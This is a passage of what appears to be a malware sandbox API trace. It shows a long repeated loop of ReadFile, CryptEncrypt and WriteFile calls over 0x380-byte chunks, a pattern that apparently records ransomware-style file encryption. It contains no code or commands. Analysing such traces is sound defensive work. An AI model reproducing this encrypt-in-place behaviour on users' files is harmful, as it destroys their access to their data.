hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.255] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.255] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.255] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.255] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.255] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.255] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.255] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.255] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.256] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.256] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.256] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.256] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.256] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.256] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.256] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.256] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.256] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.256] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.256] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.256] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.256] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.256] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.256] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.257] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.257] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.257] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.257] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.257] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.257] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.257] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.257] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.257] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.257] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.257] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.257] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.258] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.258] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.258] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.258] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.258] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.258] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.258] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.258] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.258] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.258] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.258] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.258] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.258] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.258] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.258] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.259] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.259] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.259] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.259] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.259] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.259] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.259] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.259] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.259] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.259] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.259] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.259] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.259] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.259] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.259] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.259] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.260] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.260] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.260] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.260] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.260] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.260] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.260] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.260] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.260] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.260] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.260] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.260] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.260] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.260] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.260] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.260] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.260] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.260] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.261] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.261] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.261] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.261] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.261] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.261] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.261] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.261] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.261] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.261] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.261] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.261] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.261] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.261] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.261] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.261] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.261] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.262] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.262] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 